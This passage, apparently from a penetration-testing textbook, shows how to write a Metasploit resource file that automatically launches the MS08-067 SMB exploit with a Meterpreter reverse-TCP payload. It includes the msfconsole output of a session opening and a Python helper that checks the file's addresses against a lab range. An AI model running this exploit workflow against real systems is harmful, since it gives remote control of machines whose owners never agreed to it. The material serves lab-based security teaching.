
The Joy of Exploitation

73

A more complex resource file might automatically run a particular exploit against a machine in your lab environment. For example, the following listing uses an SMB exploit in a newly created resource file called autoexploit.rc. We set a payload and our attack and target IPs in this one file so that we don't have to specify these options manually when attempting this exploit.

root@bt:/opt/framework3/msf3/ echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set RHOST 192.168.1.155 >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set LHOST 192.168.1.101 >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo exploit >> autoexploit.rc
root@bt:/opt/framework3/msf3/ msfconsole

msf > resource autoexploit.rc
resource (autoexploit.rc)> use exploit/windows/smb/ms08_067_netapi
resource (autoexploit.rc)> set RHOST 192.168.1.155
RHOST => 192.168.1.155
resource (autoexploit.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (autoexploit.rc)> set LHOST 192.168.1.101
LHOST => 192.168.1.101
resource (autoexploit.rc)> exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering the vulnerability...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1033)

meterpreter >

Here we specify the resource file within msfconsole, and it automatically runs our specified commands, as shown by the output displayed above.
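Because a resource file runs every command in it without pausing, it is worth checking that the addresses it sets stay inside the lab network before handing it to msfconsole. The following Python helper is an added example, not code from the book or from the Metasploit Framework: it parses the set RHOST/RHOSTS/LHOST lines of an .rc file and reports any address that falls outside an allow-listed range. The sample .rc text is constructed to match the autoexploit.rc built above.

```python
"""Scope check for a Metasploit resource file (hypothetical helper, not part of Metasploit)."""
import ipaddress
import re

# Constructed sample: the same five lines the echo commands above write into autoexploit.rc.
SAMPLE_RC = """\
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.155
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit
"""

# Matches "set" or "setg" followed by one of the address options we care about.
SET_RE = re.compile(r"^\s*setg?\s+(?P<opt>RHOSTS?|LHOST)\s+(?P<val>\S+)", re.IGNORECASE)


def extract_addresses(rc_text):
    """Return (OPTION, value) pairs for every RHOST/RHOSTS/LHOST assignment in the file."""
    found = []
    for line in rc_text.splitlines():
        if line.lstrip().startswith("#"):  # resource-file comment line, skip it
            continue
        m = SET_RE.match(line)
        if m:
            found.append((m.group("opt").upper(), m.group("val")))
    return found


def out_of_scope(rc_text, allowed_cidrs):
    """Return the (OPTION, value) pairs whose address is not inside any allowed CIDR.

    A single IP or a CIDR value is checked as a network; anything else (a hostname,
    a dash range such as 192.168.1.1-50, a file: reference) cannot be verified here
    and is reported so a human looks at it."""
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    bad = []
    for opt, val in extract_addresses(rc_text):
        try:
            target = ipaddress.ip_network(val, strict=False)
        except ValueError:
            bad.append((opt, val))
            continue
        if not any(target.version == n.version and target.subnet_of(n) for n in nets):
            bad.append((opt, val))
    return bad


if __name__ == "__main__":
    problems = out_of_scope(SAMPLE_RC, ["192.168.1.0/24"])
    print("all addresses in scope" if not problems else f"OUT OF SCOPE: {problems}")
```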

NOTE These are just a couple of simple examples. In Chapter 12, you will learn how to use karma, a very large resource file.

Wrapping Up

You've just exploited your first machine and gained full access to it with msfconsole. Congratulations!

We began this chapter by covering the basics of exploitation and compromising a target based on a discovered vulnerability. Exploitation is about identifying a system's potential exposures and exploiting its weaknesses. We used nmap to identify potentially vulnerable services. From there we launched an exploit that gave us access to a system.

In the next chapter, we will explore Meterpreter in more detail as we learn how to use it in post exploitation. You will find Meterpreter to be an amazing tool once you've compromised a system.